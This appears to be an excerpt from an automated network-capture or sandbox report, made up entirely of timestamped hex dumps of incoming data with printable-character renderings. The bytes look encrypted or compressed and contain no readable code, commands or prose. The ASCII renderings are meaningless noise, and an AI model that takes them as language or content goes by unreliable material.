                                              2021-11-29 13:25:46 UTC31INData Raw: 28 94 98 a3 c0 40 ef a5 01 29 da 9f 2e 6c 27 c3 39 d0 fe b0 a6 10 9e fb 31 b7 31 08 57 9f a6 5f 76 7f 7b ca 9b 28 99 ee ed e3 24 91 c0 23 11 e2 96 fa 7d 22 44 dc 34 e0 8a 37 b8 31 98 f9 35 73 89 cf 3a a5 24 e2 31 76 12 a8 2f 33 a3 a3 39 0a d9 03 93 44 53 e8 2d 00 82 d2 85 71 27 27 f0 0e 47 b8 eb 55 7d 61 38 a6 56 ae 7a 1e 40 ee 59 37 ef 44 90 e7 db 64 db 48 d7 d1 cf ef 46 22 a4 cf 89 36 e3 f8 52 b2 2f 36 6a 66 33 f8 a2 a1 5f 6f c9 11 17 f1 65 af 63 05 99 23 e1 89 06 4d 93 85 bf 16 0f a5 b0 46 dc 87 f4 ef 3f b3 22 48 3d 42 53 c4 83 4d 5c 82 ae 95 b9 4a 16 f3 cc e4 12 3f 10 2c a7 b1 9c b9 27 89 17 30 f3 c8 ce a2 41 ef f1 86 a4 e1 54 b9 40 44 58 05 ac 80 a3 62 1a 52 9f c1 da 49 5c 16 da 04 40 f6 a7 9f 7b 33 5c 78 b4 7d 25 11 a8 35 30 88 2d d4 d2 c1 fa bf 3d
                                              Data Ascii: (@).l'911W_v{($#}"D4715s:$1v/39DS-q''GU}a8Vz@Y7DdHF"6R/6jf3_oec#MF?"H=BSM\J?,'0AT@DXbRI\@{3\x}%50-=
                                              2021-11-29 13:25:46 UTC32INData Raw: d6 09 68 a5 a1 0d ba 89 00 30 a6 98 27 5b af 87 e7 a0 c5 7e e6 e9 17 76 8f 98 9e 0d 3e c6 1a c5 ef a4 70 55 44 a7 4d b6 31 61 92 32 ed cd 37 b3 42 a8 21 9c 13 c7 4f bc 0e 9b 03 5b e5 f0 7f 5d 57 97 51 7a fd 9c a4 a1 20 73 60 cd 58 ed 6e e2 9a 98 08 08 19 ce f2 8b a3 1b e1 8d 03 c8 b9 46 95 f2 e5 8f 53 96 f1 1d 29 7c 23 e9 c4 a0 e8 28 65 b6 19 42 bc 05 5e e9 cd 35 8d 77 5c d4 fd 71 18 b9 c6 30 05 48 fa ed 1c be a9 66 6c a2 2f fa 7f fb ad 65 b9 a6 3d fa 12 e8 13 01 98 20 73 d5 b2 ff 4c 4c f2 e4 fa a6 24 f3 b4 6c a5 2c 8d b1 4c 22 ea fb 75 f4 42 88 fd 14 63 67 6c 2b ef e7 4f 2d d9 98 97 23 22 bb 3c c2 d0 61 39 73 78 e4 3e c4 42 63 f9 c2 db 3e 5f 1e 1c 77 e9 4a 24 5d 1f 08 3f 33 b2 51 4e 21 ca f8 8d a7 a3 8c bd b6 9c 80 41 8a bd e6 2b 2d 35 2b fe 1a 85 4b 3a
                                              Data Ascii: h0'[~v>pUDM1a27B!O[]WQz s`XnFS)|#(eB^5w\q0Hfl/e= sLL$l,L"uBcgl+O-#"<a9sx>Bc>_wJ$]?3QN!A+-5+K:
                                              2021-11-29 13:25:46 UTC33INData Raw: 44 77 7b 67 ed 06 ac 50 b9 43 a9 ce 59 e7 bc 72 7f 86 e1 cd 5d 6c c6 60 f3 f6 b4 46 28 85 d3 77 95 ca f8 54 c0 6a 33 75 7f 5a eb a5 66 47 aa ce 39 9b f6 46 be 68 10 0a 1d eb 15 0f 50 41 23 23 1f 0d 8e 10 da da 9b d5 c1 39 9b 39 3d 2f 48 5a d6 1e f3 5b 49 b8 f6 9a 5b 19 ec d4 1a 13 63 5d 66 83 3a 0c 80 cf c1 74 c6 e5 5f 6a ba 9b fb de 99 ac 1f 55 c8 d7 c9 5a 37 36 a8 b2 71 2a 5d 4f 5a da 49 47 76 ce 04 51 d4 18 ab 7a 39 54 63 3e 7d 25 00 b6 3b a1 35 1e 24 d2 d0 f5 94 c8 37 88 d2 c0 d4 c4 b6 e7 63 e9 d2 cf f8 ec 5b d8 71 69 82 06 cf 2b 79 d1 8a 75 0c 2c cc 4f 8d a4 7f d9 92 12 f5 27 fa e4 b8 77 13 4b 5d a9 64 e9 75 32 33 fe f9 97 fa 87 7f c9 7e 00 7c 9f 96 c1 25 43 40 45 ba 05 e1 39 a6 3c b1 46 03 e4 48 4c fc 9b 8b f4 47 7f fd 23 c5 64 80 31 17 4c ba 1c ac
                                              Data Ascii: Dw{gPCYr]l`F(wTj3uZfG9FhPA##99=/HZ[I[c]f:t_jUZ76q*]OZIGvQz9Tc>}%;5$7c[qi+yu,O'wK]du23~|%C@E9<FHLG#d1L
                                              2021-11-29 13:25:46 UTC34INData Raw: 0d 12 67 bb bd dd 1f 22 40 21 e1 e1 5e e9 04 2e c5 78 52 aa 03 7e df c1 3d 9d 9f a3 f9 dc 0d 38 b5 c6 3c 6f fd fa c1 14 9e b2 41 b8 a8 43 4d 7e d7 ab 57 b5 b5 05 e8 ec 85 3f 03 8f 60 73 dd ba 17 41 4b 95 cf f0 96 15 f5 9a 0a eb 2e f0 f2 66 22 ee e7 6a c4 48 92 56 15 4f 72 2a 2d e8 f5 36 b9 f2 d5 9d 44 18 44 3d e4 a1 2b 2b 72 54 b2 33 c4 40 59 0e da fb 3c 4f 08 e2 7e dd b9 22 1e 59 7a 5e 38 aa 68 69 2f ec e3 89 be 55 9a 6f bf c3 e0 58 86 b7 e4 28 df 34 0f ec fd ae 7d 34 67 dd 0f 16 5e 22 2d 5d 11 ea 14 59 d4 2d a5 bc 9d 47 a2 d8 8b 37 7d d5 53 37 14 a4 5a 25 21 a1 76 4e 59 85 fe 00 fd 05 28 97 b9 5a 6e 75 7b ed 9c 44 84 3b 3e 0f 72 7e 04 93 0a db b5 9c 36 cc ae 32 81 3b 77 e0 81 b5 aa 28 ec 06 08 c6 53 d1 67 ba 79 da ba 47 8c 0f ed ae b0 c5 14 88 c4 4f cf
                                              Data Ascii: g"@!^.xR~=8<oACM~W?`sAK.f"jHVOr*-6DD=++rT3@Y<O~"Yz^8hi/UoX(4}4g^"-]Y-G7}S7Z%!vNY(Znu{D;>r~62;w(SgyGO
                                              2021-11-29 13:25:46 UTC36INData Raw: b8 9b 08 80 87 74 e8 cf a2 d1 dd bc 57 f2 c6 ac ac 1f 55 95 6b 49 ad 1c 1a a1 b5 60 75 cb 4f d3 dc 54 4b 3e c6 1d be fd a3 af 51 39 4c 00 a6 75 3a 07 45 33 03 88 3c d8 fa bd f4 a5 c9 00 a7 dd c0 da a8 eb 18 62 cf a7 e5 6c c4 35 d3 72 0c 67 4d cf 21 71 c6 0f ce 2c db d3 44 73 94 58 f4 98 c4 ea 2d 85 b3 b1 6c e7 30 68 a5 ed 72 ff 26 b1 49 27 9f 29 6e a8 68 43 03 54 f1 9d c7 39 56 a7 08 ad 0c 6b a6 62 a1 b8 5a 29 eb 5e c8 47 b3 92 eb b9 74 d7 3e e7 75 28 ee 13 c2 05 b7 3c d5 66 ee cb 67 c0 b2 03 6d 36 5b 47 16 02 7d 81 c4 fa b7 ea da f0 7d 3f 45 4b de 1c a4 96 86 d9 cf 3d 0e 31 7e 18 d9 b1 e0 e8 62 bb 54 30 4e 1d 6a cb 13 e5 2c 11 f2 ff 63 3f 90 bc e2 d8 aa 61 ee de 6f ab d4 9a c2 d7 cf a9 8a 75 e3 ab f2 af 3e 57 71 9f 46 9e 9f 26 6a b1 b1 1e 5b de 4f 01 90
                                              Data Ascii: tWUkI`uOTK>Q9Lu:E3<bl5rgM!q,DsX-l0hr&I')nhCT9VkbZ)^Gt>u(<fgm6[G}}?EK=1~bT0Nj,c?aou>WqF&j[O
                                              2021-11-29 13:25:46 UTC37INData Raw: 0c d4 bb 29 2d 49 3d e6 c3 6a d5 73 7c ab 14 c1 70 1c 0f 24 28 39 7d 04 f9 46 c1 47 a9 31 51 09 6d 39 aa 73 4a 05 e3 e3 87 ac d8 ad 42 b7 ba 88 5f ae 89 ed 32 d5 4a 66 fa 03 ab 79 b0 72 d1 09 36 fc dc 2c 7b 7c fb 17 72 47 01 96 2d 9b 47 de a6 eb 37 30 d1 7b 84 02 af 2f 6c 9e a1 7c 48 45 dd fe 00 fd 0e 02 d9 f2 5a 68 0f 08 eb ef 66 ad 0d 37 1c 71 47 25 82 0c be fd a7 37 c6 b5 31 b1 f3 5c e1 87 c1 db 2d f4 6d 0a f0 50 db 69 91 32 42 ba 4d e9 26 e8 bf bf ac 5f b1 c7 45 da a6 c6 22 03 c3 b4 65 ae 83 95 e0 d2 9a c5 27 e9 5f c3 28 9f 3c 9a f3 59 f0 b3 f3 76 da 9f 2b e6 ba cb 2a dd c7 05 b2 04 8f 19 24 b6 31 03 42 bb 38 51 60 6e 99 bb 97 3f 8b 5a 6c ed 3c 80 74 8c 1d fb 8a 09 56 2f 5e c0 ae d9 bc 23 90 90 e6 99 3f 55 91 f4 ad a7 35 eb 06 c7 ec a9 09 51 88 ae 21
                                              Data Ascii: )-I=js|p$(9}FG1Qm9sJB_2Jfyr6,{|rG-G70{/l|HEZhf7qG%71\-mPi2BM&_E"e'_(<Yv+*$1B8Q`n?Zl<tV/^#?U5Q!
                                              2021-11-29 13:25:46 UTC38INData Raw: f5 27 a1 97 b9 77 13 5e 7e a1 ea 54 a4 12 e8 4a 2f 86 08 29 ab 44 53 28 5f 9e 9c cd 1b 02 df 43 ab 24 4b 8e 12 aa d7 6a 04 fc 4b c5 63 e4 99 f5 41 5d 42 39 cc ec 1f c4 1f c2 07 80 68 28 67 c4 c2 41 bb f9 09 02 08 59 6f 6d 04 55 d2 c4 d2 de c3 63 f8 7e 11 03 69 de 16 86 36 dc da c9 1d 39 18 72 18 db c3 24 e8 4e 91 51 63 5e 1e 6a c9 38 74 5f 10 f4 dd 43 17 ff b7 ca 8e aa 49 86 f7 4b a1 fc 18 ad ed c8 8f 9e 7e 8c dd eb 51 35 14 25 9d 6e e5 8d 21 4b f2 ab 1a 73 5e 17 44 9c 65 2f b4 e8 6c 1f 93 ac 94 c5 75 c0 66 a3 7f c3 d7 66 9f 09 5e e9 a0 21 b9 8d 2e 3e ab 1b 90 44 87 43 f7 88 df 72 f3 fe 08 87 aa dd 8d 11 36 55 1e 3d ff 8e 74 65 6d a7 44 a4 dc 65 af 33 d3 f7 2e be 48 8d 3e 73 17 e3 44 83 b2 9b 0a 42 fd 06 69 a7 46 b4 45 4a 97 6a d5 e9 05 b7 59 c0 72 69 25
                                              Data Ascii: 'w^~TJ/)DS(_C$KjKcA]B9h(gAYomUc~i69r$NQc^j8t_CIK~Q5%n!Ks^De/luff^!.>DCr6U=temDe3.H>sDBiFEJjYri%
                                              2021-11-29 13:25:46 UTC40INData Raw: f9 11 fe 20 4b ef f1 5c 01 fb 69 eb e9 71 81 2a 32 0d 7e 47 63 81 0c b2 fd 17 37 c6 b9 24 9e 45 58 f0 88 97 d8 2e f4 6f 4d 4d 52 db 69 aa 13 53 bf 6f e2 1f e9 b9 da 5a 77 89 ce 54 d9 f0 c3 21 03 c1 f3 1d ac 83 99 a8 55 1d c5 2d 86 73 4f 03 95 3a b3 d9 50 f9 9d eb 15 da 99 40 53 36 c9 20 d2 c7 30 b3 04 8f 19 92 b6 31 03 6c bc b7 53 6a 37 cb fc 9e 17 04 73 fc e5 53 0a 5d 32 17 ed 94 4e e1 2f 5e c0 8e f8 ae ab 91 96 92 96 b3 54 95 d6 1d 13 35 ed 28 6a e6 82 14 37 9a 24 20 9a ea d5 e0 ba ac fd 52 9f 8c d2 9e 56 8e 35 0e 09 78 98 d2 17 66 ed 0d b7 50 be 5b 85 23 ed 53 26 0c f1 91 e7 dc 23 f0 48 d7 d1 f6 bf 6e 95 ae d8 59 a8 cd d3 47 a2 3a 23 7c 5d 43 f4 a2 b6 3f fa d8 ef 10 f5 fe be 69 1b 10 0e e1 8d 2e c8 42 97 b5 3b 2b 9c a3 6e 53 8c dc d1 13 85 39 39 03 70
                                              Data Ascii: K\iq*2~Gc7$EX.oMMRiSoZwT!U-sO:P@S6 01lSj7sS]2N/^T5(j7$ RV5xfP[#S&#HnYG:#|]C?i.B;+nS99p
                                              2021-11-29 13:25:46 UTC41INData Raw: 7b 82 dd b3 14 fa 4b 9b 47 4e 1a 10 94 ce 3c c6 54 01 f6 7b d7 25 18 a2 ec c1 ac 49 91 da 78 5f fd 3e c1 cf da 8a 94 68 e6 bc e6 af 3e 57 52 95 79 39 93 39 6d 82 bc 1d 4a db 0c ba 97 45 3c ba 85 59 74 90 a6 9f e4 79 ef 66 a9 1a 22 d5 4d dc 1b 65 5e a0 30 ba 88 d4 2e 83 96 30 41 b3 79 f7 89 d3 6b 1b ec 2c ae a8 c9 bc b6 c0 30 f2 3d c4 9b 42 4e 49 f0 45 ae cf 3c be 36 ea d9 36 33 69 a1 37 63 18 ed 5b 8b e2 9b 0a 44 70 08 69 51 a5 bc 54 42 1a 65 43 7e f4 78 4b c7 c6 ee 3d 53 57 95 26 0a 93 c3 ed 8e 4c 0c 37 d9 9a 84 aa 58 47 0d 1a 70 d9 ba ed 3d bd 4c 21 e9 65 a6 f5 08 b0 b6 19 53 36 0f 6b d9 a4 a1 93 96 54 e7 88 93 29 a6 cc 2b 3d 9f fd f2 1d aa ea f6 6a b5 34 1b 53 4b a9 62 b8 b9 09 70 ea f6 31 1c 80 b0 75 c2 a4 1e 53 fc f6 d0 e8 92 df 68 b0 1c f8 32 9f 27
                                              Data Ascii: {KGN<T{%Ix_>h>WRy99mJE<Ytyf"Me^0.0Ayk,0=BNIE<663i7c[DpiQTBeC~xK=SW&L7XGp=L!eS6kT)+=j4SKbp1uSh2'
                                              2021-11-29 13:25:46 UTC42INData Raw: cf bb b0 04 85 64 0e a5 20 21 20 93 b7 55 ec 57 e7 db 96 2c 89 63 fa f9 b0 b9 5c 32 1c ed a8 fa 6d 2e 54 e6 ad c9 25 22 90 96 89 e8 2c 59 84 cc 23 9b a2 ef 2e 79 fb b8 13 2d 99 bc 32 a2 62 b8 6e bb bd fb 2c 14 a5 a6 95 7e 32 1d 1f 0f 6b 98 e9 45 4f 70 06 a6 5c b1 61 b4 52 e2 41 2c 4b e2 91 e7 d0 5d 6f 60 d7 da e7 bf 2c f4 86 46 5e bb c2 d3 4a a1 30 20 79 5d 58 f6 a2 ba 41 77 f1 ef 17 dd 4c 68 77 c7 2b 94 f1 89 0c 39 31 96 bf 1c 07 94 b5 53 b3 fe dd db 34 9b a8 3f 2f 44 3c 7f 91 44 49 80 9e 88 9b 4a 3a fd c1 32 02 13 1d 37 c4 0a 0d 80 cf 1a fd cf ec db f5 3a 40 fe f4 88 b8 70 26 94 63 5f 7b 9c 35 a8 b4 0d ba 59 4f d9 c9 69 56 1e df 11 68 ed 8f ab 70 5c f7 0d a6 77 00 27 be 14 3e ae 15 d1 ab ac f5 a5 c2 6e d5 d1 c0 d3 a4 fe f7 76 8c db e6 6f e6 73 50 71 06
                                              Data Ascii: d ! UW,c\2m.T%",Y#.y-2bn,~2kEOp\aRA,K]o`,F^J0 y]XAwLhw+91S4?/D<DIJ:27:@p&c_{5YOiVhp\w'>nvosPq
                                              2021-11-29 13:25:46 UTC43INData Raw: d3 6c 1b ec 2c a5 bb ed 85 00 3e d0 15 28 e4 88 63 47 56 b2 ba af e3 69 86 39 fa c6 2e a1 54 b2 3d 62 03 e1 5a 55 02 b7 09 5c ff 04 7e 60 5f a3 5a bc 87 4f 4a 58 1f db 4a c7 50 64 98 73 85 94 35 0f 10 ca e4 a4 e9 1d 3d c3 f8 83 9d 6e fa 05 32 61 45 bc fb 72 9b 4d 21 e3 d1 b1 e8 28 2c a5 1d 48 b9 03 75 d7 c7 22 8e 77 5c d4 fd 1e 27 ca 61 35 76 09 e8 ea 09 a9 a3 60 6c bb 32 1b 6f 29 ae 51 bc 9e 91 ec ec e9 20 11 9c 26 73 cc a1 1e 54 9e f1 e3 f1 b5 79 f4 b6 03 f6 37 9e b1 66 33 e0 e4 6d 3a 41 a4 b9 12 4b cf 29 2b e5 7a 72 21 f2 d4 84 2e 25 49 2e e4 dc 72 21 6d 5f 57 3e e8 4e 65 99 c4 c7 2d 5d 04 f3 7c db b9 22 1e 5d 0f 17 9d ab 62 68 25 e6 fc 88 b4 a1 9b 52 bd af 90 a7 87 91 ff 34 fb 91 06 fa 09 23 6e 36 70 d0 1c 1b 5d cf 3f 7b 13 d0 1c 6b b3 06 92 98 91 28
                                              Data Ascii: l,>(cGVi9.T=bZU\~`_ZOJXJPds5=n2aErM!(,Hu"w\'a5v`l2o)Q &sTy7f3m:AK)+zr!.%I.r!m_W>Ne-]|"]bh%R4#n6p]?{k(
                                              2021-11-29 13:25:46 UTC45INData Raw: e6 da 46 07 e4 d6 db ed aa 5c 0a 15 d8 5f b1 e0 68 51 b3 3a 1a 51 75 20 fd 8a 9f 50 70 d3 c3 0a da 59 a4 41 a6 03 0b fa a1 96 44 43 91 97 32 14 8d ae 6e 77 8c dc d1 51 1f 29 3c 25 45 3c 72 91 44 49 80 b1 a2 b8 5a 19 ec c6 16 3b bd 1c 3d a1 a6 05 a8 9d 75 e8 c9 ff d5 c2 b7 69 45 fe 99 a7 37 c4 96 63 53 7b 39 36 a8 b8 4a 90 59 4f d9 c9 4c 56 3b ba 6f 40 fc 8e c4 bb 33 56 06 b5 70 1d a8 bb 32 2f 93 33 b4 10 d0 f5 af eb 83 a9 d1 ca c1 b0 f0 e1 4b fd ab e7 69 fd 5f c6 5a 94 19 06 c9 37 f8 de 04 c2 2d c7 d8 5b a5 36 74 f1 b9 7e e0 21 89 b9 91 50 19 31 4e b3 ec 4f a5 12 8c 49 2f 8a 0c f2 81 6a 57 00 7a 8f 9a ef b8 55 dc 49 c2 80 6e 8e 18 88 ec 50 05 fa 52 cb 5a b5 b2 b5 46 75 f1 2a c5 9e 25 e7 1f d9 25 fe 30 2b 61 d1 e0 6c 93 b9 02 6d 38 49 65 13 12 7d 8b dc fa
                                              Data Ascii: F\_hQ:Qu PpYADC2nwQ)<%E<rDIZ;=uiE7cS{96JYOLV;o@3Vp2/3Ki_Z7-[6t~!P1NOI/jWzUInPRZFu*%%0+alm8Ie}
                                              2021-11-29 13:25:46 UTC46INData Raw: 55 c5 b9 74 c6 c7 2e 92 98 5a c1 51 0e 2f b9 d7 33 19 b2 fa ed 1c a6 a2 7c 7f bb 00 81 7f d7 af 6c a7 b7 24 76 ff e1 2e 04 9e 24 5b 43 a8 01 4b 48 d4 cf f8 87 84 44 b7 03 e3 3e 84 aa 6f 4d 5b fa 66 ce 53 9c be 07 70 5f 11 2a ef f6 48 35 e3 c6 0d 38 30 54 34 ff d6 0c 9b 73 50 a3 2c cf 59 45 d8 40 d4 3e 51 6b 50 77 c5 4d 37 cc 50 1f c1 38 bb 69 4a aa e3 e3 87 c8 19 9a 43 bd a4 7c 58 90 43 ef 52 ea dd 07 fa 03 be 5a 1e ef d2 0f 18 2d 6e 2d 71 19 e9 8a 72 4d 0d b2 9d 92 6f 78 db 8b 31 5f 67 52 26 0a 87 b5 44 20 ab 6f 44 3b e2 ec 16 e1 1b 3f c7 b2 4b 78 60 7d 71 fc 6f 94 30 25 11 18 dd 00 82 06 98 b9 8c 3d d7 b2 58 2b 55 5e eb f5 ad bb 2d ef 7a 2c d6 5d 55 d8 ae 27 56 92 d0 86 1c e3 ae bb bb 73 a1 0c 45 dc de c9 34 02 c7 96 e6 bd 96 84 1e 7f 8f d4 38 97 73 4c
                                              Data Ascii: Ut.ZQ/3|l$v.$[CKHD>oM[fSp_*H580T4sP,YE@>QkPwM7P8iJC|XCRZ-n-qrMox1_gR&D oD;?Kx`}qo0%=X+U^-z,]U'VsE48sL
                                              2021-11-29 13:25:46 UTC47INData Raw: 1a 96 63 53 7b 04 34 a8 b4 0d dc 58 4f d9 04 47 62 16 f9 04 40 f6 82 83 42 33 56 06 78 7d 23 20 ba 2e 2f 82 3e db d4 d0 e9 87 c3 11 b3 d1 c0 d3 b7 e1 d6 63 ff e4 e7 61 f6 5b d2 73 1d 2a 05 cf 7d 75 d9 04 9c 2c d3 dd 3c 37 95 74 fb b9 17 8b 13 88 b3 bd 5f 0e 33 44 a6 c2 19 a0 3a bb 61 37 82 20 96 c6 82 55 00 76 40 92 e2 1b 63 dc 43 a7 00 47 b6 12 a0 b2 8e 05 fa 3f f0 4a b3 9e dd 50 77 fb 3d e4 ad 34 e7 19 ea 14 aa 30 2d 08 04 ea 65 b1 27 0d 48 1a 6f 6f 67 09 70 a3 ff d2 d8 e1 04 fa 78 3d 2a 56 de 16 8c 1e 80 d9 d5 39 11 32 68 18 d1 ad 1e e9 7e 9b 4a 07 05 13 70 cf 10 cc 46 20 f1 f5 3c 17 ff bd bc d2 a9 58 f3 65 6f a1 f6 18 c4 a9 fa 8e 94 7d cb b4 e8 51 39 53 13 9f 6e e9 b6 3e 62 91 bf 72 9d de 16 4e 48 67 0d 94 b0 71 1e 99 aa b1 f4 5d ef 6c 7d 75 e8 ab 7e
                                              Data Ascii: cS{4XOGb@B3Vx}# ./>ca[s*}u,<7t_3D:a7 Uv@cCG?JPw=40-e'Hoogpx=*V92h~JpF <Xeo}Q9Sn>brNHgq]l}u~
                                              2021-11-29 13:25:46 UTC49INData Raw: fa a0 d7 2a 4d 04 e2 77 c5 47 91 32 26 20 3e 36 b0 62 62 37 e0 e3 5c a6 a1 7c 42 a3 aa 82 59 87 bd ee 2c d1 43 92 f8 0c b5 51 36 71 ca 3f 1b 42 fe 2f 71 13 a8 16 72 5c 74 04 8c 99 4d cb dc 94 2d 18 6e 53 26 0a 87 99 47 20 a7 54 66 2a e7 f5 0b f0 20 05 ec f1 50 78 8f 69 ec c7 d3 86 3b 32 34 53 6f 01 88 24 85 92 9d 3c d0 41 36 f9 78 5d f0 85 95 bc 05 45 6a 22 c1 7b ff 6f b9 1c 6a 2f 47 86 16 e5 97 07 a9 77 8f c9 6d 6f db a6 24 70 43 9d ed a6 8b fc 7d 6d 9a cf 42 01 64 c2 22 82 55 3a cb 5a fa da 04 17 da 95 3c c7 1e 7d 29 db e9 c8 36 05 85 7c 16 d8 84 08 44 99 d8 d4 61 68 ed cc f8 b7 8e 72 f6 80 b5 87 5c 38 0e fc a8 d3 6f 2e 58 b9 2c f0 86 2a 98 f9 2d f8 3f 5f fa 5b 34 a5 3f fa 41 f1 ed a9 09 51 3b ae 21 90 f3 b0 7f b1 84 3d 3d 13 87 f1 94 7e 38 35 0e 0f 6b
                                              Data Ascii: *MwG2& >6bb7\|BY,CQ6q?B/qr\tM-nS&G Tf* Pxi;24So$<A6x]Ej"{oj/Gwmo$pC}mBd"U:Z<})6|Dahr\8o.X,*-?_[4?AQ;!==~85k
                                              2021-11-29 13:25:46 UTC50INData Raw: 31 95 b0 ba 54 2c 5e 99 88 ef 8c 57 dc 45 ba 81 68 8e 12 a1 b4 58 13 f8 cd fd 4b b3 9b 57 4f 61 ef 13 05 eb 37 ed 05 d1 08 a8 21 2e 71 3c eb 49 b8 ee 10 68 32 49 6a 7d fd 7c a7 c5 f9 da c0 7b fd 6a 3f af 48 de 10 9b 93 81 d9 c9 1a 1d 34 64 1d 5d 93 1e e9 4f 39 5e 46 0c 09 7e d8 9d e2 5d 10 f3 e6 64 06 fb ab f5 4e b8 4d a8 7c 6f a1 f6 03 c6 c1 59 a3 b1 70 f5 39 c2 40 3f 7b 50 4c 51 ef 9e 27 48 85 b9 1d 51 f6 22 45 96 63 51 83 87 71 1f e2 99 99 cc 5c 11 6d a0 75 9a c7 4d d6 1b 5c 5b a0 21 a4 ae 29 2f
                                              Data Ascii: 1T,^WEhXKWOa7!.q<Ih2Ij}|{j?H4d]O9^F~]dNM|oYp9@?{PLQ'HQ"EcQq\muM\[!)/
                                              2021-11-29 13:25:46 UTC50INData Raw: f3 95 27 52 e8 79 e6 9d bf c1 e5 ed 0a a6 85 b2 af 01 3e cb 25 2c ec 88 74 65 18 a4 44 a8 e7 78 bc 36 fd a9 e8 be 42 ab e9 6c 37 c3 7a ab 03 91 06 6c d4 0e 7e 7b 8b bc 52 3c ad 62 5b 5a 1f 6f 49 c7 5c c0 75 70 85 93 0e 13 0d c5 f1 c1 2f 0c 37 d3 d8 8c 94 50 c4 0d 1a 7a 48 94 c9 1d 3a 46 ff e9 ff 8a e9 34 26 b6 19 53 ac 09 69 e4 cd 33 8f 89 5d f9 f0 0f 1f b9 da 78 76 0d e1 ed 16 b4 ab 5a 65 aa dc 06 7e d7 c3 7d b5 b7 46 56 ec e9 35 09 f1 bf 73 dd a1 0d 33 f3 f0 cf f2 9e ee 8a 98 02 e9 29 a5 ac 64 22 ec f6 6f ec 80 8b a8 12 4b fc 28 2b e5 de c5 21 f2 df 84 2f 2b 41 15 df dc 63 21 5f 57 af 34 19 ea 4c f0 db c6 3a 7f 91 e2 76 cf 54 2b 23 59 21 fe 3a aa 64 4a fc e1 e3 8b 8f 60 9a 43 bd df 4e 58 86 b7 fd 34 da 1c 9b fa 03 a5 79 20 72 d1 09 0d 45 cd 2b 5c 14 c7
                                              Data Ascii: 'Ry>%,teDx6Bl7zl~{R<b[ZoI\up/7PzH:F4&Si3]xvZe~}FV5s3)d"oK(+!/+Ac!_W4L:vT+#Y!:dJ`CNX4y rE+\
                                              2021-11-29 13:25:46 UTC51INData Raw: ae 40 e8 3c 08 61 7b 96 f6 d0 5d 6f 27 f3 d9 e7 b3 57 28 bf dc 30 9d ca f8 54 a2 36 1a a5 76 20 f1 cd 9a 52 70 df e9 07 d7 29 a6 68 1d 09 1a fe e6 c1 47 43 9d 85 bb ea 72 5b 98 ca 9c d2 ae 05 b3 28 3d 03 4e 42 d1 e5 7f 43 93 bc f5 ee 5b 19 e6 08 c4 06 36 35 0a ab ab 06 93 c8 06 52 cf ec db d6 85 79 fe fe 93 73 1d 53 bf 64 7f 53 1d 36 e9 86 62 1a 5a 4f d3 da 10 47 3e ce 67 41 fc 8f 17 7b 33 56 1a a6 7d 25 0a bb 32 2f 82 3e db d2 d6 f5 a5 c3 d1 a8 d1 c0 06 b6 e1 e6 76 e3 a8 e7 75 ec 5b d3 61 36 1f 06 cb 20 75 d9 6a c2 2c c2 da 5c 88 ad 81 f1 b3 11 f5 30 8c ae 47 76 35 34 52 aa f4 4d a6 3a ac 4c 34 7e 21 bc a1 7c f5 00 7c 9e 80 d4 36 54 cd 46 b5 f2 6e a2 1b 88 96 52 05 fa 4d db 58 b6 9a e4 42 6b 05 3a e0 d8 3f e5 16 d8 62 47 30 2b 6d dd fa 4d 94 f8 03 67 31
                                              Data Ascii: @<a{]o'W(0T6v Rp)hGCr[(=NBC[65RysSdS6bZOG>gA{3V}%2/>vu[a6 uj,\0Gv54RM:L4~!||6TFnRMXBk:?bG0+mMg1
                                              2021-11-29 13:25:46 UTC52INData Raw: e9 f9 a0 e8 28 26 b6 19 55 aa 09 75 de cc 3d 95 97 5c f8 f0 1a 2f b9 c6 2e 76 03 fa f6 26 b6 b0 2a 6d aa 38 75 7e d7 be 0e 0f a6 35 e6 e6 97 03 03 8f 26 5b 05 a8 01 4b 77 9f f2 f8 8d e1 d9 b1 05 e2 f0 92 ba 66 22 34 ef 43 ec 77 88 a8 1e 70 63 2e 20 c7 ce 59 21 f8 08 9e 2a 3a 45 43 d2 dc 63 21 5a 88 aa 3f c2 5f 21 cd db d7 34 5b 0c 8d c7 c4 47 29 3f 58 1a 31 2f b9 6f 5a f4 e0 e3 81 b6 a5 8a 4e 2d a3 87 27 ba bd ee 38 fb ed 04 fa 05 be 54 1e 54 d1 0f 14 55 b3 11 71 13 cb 05 74 65 14 bf 8c 93 56 de f0 51 34 30 d3 3c 94 01 af 23 30 32 a1 7c 59 45 f1 fe 00 fd 1b 21 fd f7 72 b5 72 68 ed 80 d0 84 3b 3e 68 65 6f 01 99 1f b3 83 9b 1e 1a bc 37 9f 3b ec e0 81 b5 cf 3f f4 69 39 d4 5b c9 67 a8 1e cc 0d 50 5c 34 ef bf b5 81 66 8e d5 4d f4 38 a6 22 05 d4 95 9e 8e 81 93
                                              Data Ascii: (&Uu=\/.v&*m8u~5&[Kwf"4Cwpc. Y!*:ECc!Z?_!4[G)?X1/oZN-'8TTUqteVQ40<#02|YE!rrh;>heo7;?i9[gP\4fM8"
                                              2021-11-29 13:25:46 UTC54INData Raw: de ad 47 91 63 99 ad 15 79 a4 72 53 42 18 1e 42 b1 62 1c 4d 59 fb 9e 48 47 34 d9 9e 68 17 8c ab 7c 26 40 24 e2 7c 25 00 ad a8 07 81 3f db d4 f8 69 a5 c3 15 c6 f7 c2 d2 b1 ca d5 72 e6 80 0b 6c ec 5d bd ef 06 1a 0c e3 04 64 df 15 c7 04 3f cf 4f 8b 80 62 d9 f7 10 f5 2b 9e 29 91 9c 1a 31 42 b5 fc 76 e7 3b bd 43 39 1a 4f b6 ab 44 53 11 7a b6 71 c4 33 52 b3 69 af 0c 69 88 03 a6 d7 48 04 fc 4b d3 41 dc 5d f5 47 7f c1 f0 32 15 c8 39 09 d3 07 dd 0b 2b 67 c3 c6 69 aa f3 76 56 32 58 6e 08 54 7d 8b cd 0e c9 e3 cd 2c 6d 1f 3a 42 cf 1f 02 a9 b9 a3 37 e4 ee e2 67 3d f9 9b 1e e9 44 88 51 38 bf 1d 6a c5 1b e5 65 10 f2 ff be 15 f9 97 e5 f8 a9 49 c1 eb 6f a1 fe 12 c2 d7 9f 8f 94 79 a9 a2 ea 51 9f 7a 5a 9c 78 ef 9e 26 60 91 b9 1d 5b de 16 44 90 69 28 bc 44 70 1e 93 6f 98 cc
                                              Data Ascii: GcyrSBBbMYHG4h|&@$|%?irl]d?Ob+)1Bv;C9ODSzq3RiiHKA]G29+givV2XnT},m:B7g=DQ8jeIoyQzZx&`[Di(Dpo
